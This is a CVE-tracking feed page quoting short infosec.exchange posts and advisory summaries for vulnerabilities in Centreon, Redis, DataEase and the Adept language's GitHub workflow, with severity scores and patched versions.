This issue affects Centreon: from 22.10.0 before 22.10.28, from 23.04.0 before 23.04.25, from 23.10.0 before 23.10.20, from 24.04.0 before 24.04.10, from 24.10.0 before 24.10.4.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-21605
(0 None)

EPSS: 0.03%

1 posts

N/A

cR0w@infosec.exchange at 2025-04-23T16:43:12.000Z ##

Redis DoS.

github.com/redis/redis/securit

sev:HIGH 7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Redis is an open source, in-memory database that persists on disk. In versions starting at 2.6 and prior to 7.4.3, an unauthenticated client can cause unlimited growth of output buffers, until the server runs out of memory or is killed. By default, the Redis configuration does not limit the output buffer of normal clients (see client-output-buffer-limit). Therefore, the output buffer can grow unlimitedly over time. As a result, the service is exhausted and the memory is unavailable. When password authentication is enabled on the Redis server, but no password is provided, the client can still cause the output buffer to grow from "NOAUTH" responses until the system will run out of memory. This issue has been patched in version 7.4.3. An additional workaround to mitigate this problem without patching the redis-server executable is to block access to prevent unauthenticated users from connecting to Redis. This can be done in different ways. Either using network access control tools like firewalls, iptables, security groups, etc, or enabling TLS and requiring users to authenticate using client side certificates.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-32966
(0 None)

EPSS: 0.04%

1 posts

N/A

cR0w@infosec.exchange at 2025-04-23T16:17:45.000Z ##

Post-auth RCE in DataEase.

github.com/dataease/dataease/s

sev:HIGH 8.2 - CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

DataEase is an open-source BI tool alternative to Tableau. Prior to version 2.10.8, authenticated users can complete RCE through the backend JDBC link. This issue has been patched in version 2.10.8.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-32958
(0 None)

EPSS: 0.04%

1 posts

N/A

cR0w@infosec.exchange at 2025-04-21T21:30:17.000Z ##

This is kind of a neat race condition:

github.com/AdeptLanguage/Adept

sev:CRIT 9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Adept is a language for general purpose programming. Prior to commit a1a41b7, the remoteBuild.yml workflow file uses actions/upload-artifact@v4 to upload the mac-standalone artifact. This artifact is a zip of the current directory, which includes the automatically generated .git/config file containing the run's GITHUB_TOKEN. Seeing as the artifact can be downloaded prior to the end of the workflow, there are a few seconds where an attacker can extract the token from the artifact and use it with the Github API to push malicious code or rewrite release commits in the AdeptLanguage/Adept repository. This issue has been patched in commit a1a41b7.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-32438
(0 None)

EPSS: 0.01%

1 posts

N/A
